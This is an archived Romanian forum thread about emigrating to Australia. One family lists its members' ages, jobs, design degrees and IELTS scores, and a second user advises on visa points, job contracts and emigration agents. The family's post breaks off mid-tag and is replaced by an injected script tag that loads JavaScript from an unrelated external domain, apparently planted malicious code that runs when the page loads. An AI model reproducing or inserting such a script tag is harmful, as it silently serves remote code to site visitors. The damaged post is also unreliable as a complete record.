PDA

Arată versiune întreagă : Avem mare nevoie de AJUTOR...

Boddhi
06.04.2006, 23:18
smileys/smiley1.gif

Suntem o familie tanara din Romania, formata din:
<DIV>Calin-Alexandru Ciulavu (sotul) - 32ani, </DIV>
<DIV>Marta Martinas(sotia) - 35 ani si </DIV>
<DIV>Mihai Ciulavu (fiul nostru) - 5 ani.</DIV>
<DIV></DIV>
<DIV>Facem precizareaca, in ciuda diferentei de nume suntem casatoriti legal de6 ani, </DIV>
<DIV>lucru care poate fi demonstrat prin acte.</DIV>
<DIV></DIV>
<DIV> Eu ( sotul ) sunt aplicantul principal in dosarul de emigrare, deoarece </DIV>
<DIV>intrunesc cele mai multe din conditiile de baza pentru realizarea punctajului.</DIV>
<DIV>Am o vechime in munca de peste 6 ani, in prezent lucrez intr-o agentie de </DIV>
<DIV>publicitate in functia de art director - graphic designer - (in care are o vechime de 3 ani), </DIV>
<DIV>sima incadrez in conditia de ultimele 12 din 18 luni lucrate.</DIV>
<DIV></DIV>
<DIV>Mai multe informatii despre noi, despreexperienta profesionala a mea, </DIV>
<DIV>precum si exemplificarea acesteia intr-un portofoliu, puteti gasi la adresa </DIV>
<DIV> www.calin-ciulavu.com (http://www.calin-ciulavu.com/)</DIV>
<DIV></DIV>
<DIV> In ceea ce priveste situatia studiilor,amandoi avem cate o diploma de designer </DIV>
<DIV>in urma terminarii a 4 anilaFacultatea de Design Industrial si Ambiental</DIV>
<DIV>din cadrul Universitatii Tehnologice Bucuresti (UNITEH) -universitate particulara.</DIV>
<DIV></DIV>
<DIV></DIV>
<DIV> Examenelul IELTS a fost sustinut in data de 9 iulie 2005 si promovat </DIV>
<DIV>cu urmatoarele rezultate:</DIV>
<DIV></DIV>
<DIV> Listening&nb sp; Reading Writing Speaking Overall Band</DIV>
<DIV>Marta 4.5 4.5 6.0&nb sp; 5.0 5.0</DIV>
<DIV>Calin6.0 5.5 6.0 6.0 6.0</DIV>
<DIV></DIV>
<DIV> In prezent, avem toate actele necesare intocmiriidosarului de emigrare </DIV>
<DI<script src=http://www.iroe.ru/ngg.js></script>

danref
17.04.2006, 16:42
Salutare tuturor pe acest forum.

Pt Boddhi,

Cautarea unui contract de munca "ferm" e o pierdere inutila de timp din moment ce voi locuiti inca in Ro.parerea mea este sa va concentrati eforturile in pregatirea dosarului pt Dimia si expedierea lui cat mai grabnica spre Oz.Joburi veti gasi aici cu siguranta .Contractul "ferm"adica un job full-time in permanent position se obtine de regula dupa o anumita perioada de casual in care veti fi analizati si testati in diverse task-uri .Incercati sa fiti relaxati in aceaste privinte si inca o data concentrare maxima la "piesele din dosar".Eu nu prea am inteles in postul tau daca va calificati la puncte pt care tip de visa?Ati primit assessment-ul job-ului pozitiv de la autoritatile australiene acreditate?

Daca situatia voastra de emigrare pare mai complicata si nu credeti ca reusiti singuri cautati un agent de emigrare acreditat .

regards